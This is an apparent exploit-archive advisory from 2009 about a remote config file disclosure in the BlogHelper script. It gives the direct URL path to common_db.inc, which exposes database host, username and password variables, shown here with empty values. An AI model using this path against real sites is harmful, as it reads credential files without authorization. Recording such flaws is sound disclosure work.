id: 4616
date: 01/06/2009
title: BlogHelper (common_db.inc) Remote Config File Disclosure Vulnerability
author: ahmadbady
cves: 

======================================================================
BlogHelper (common_db.inc) Remote Config File Disclosure Vulnerability
======================================================================


......

  Remote Config File Disclosure
----------------------------------------------------
script: BlogHelper
   
***************************************************************************
download from:http://www.freedville.com/oss/BlogHelper.zip
   
***************************************************************************
vul:

www.site.com/path/common_db.inc
................................
  $dbhost = "";
  $dbusername = "";
  $dbuserpass = "";
  $default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------  
*************************************************



#  0day.today [2023-03-25]  #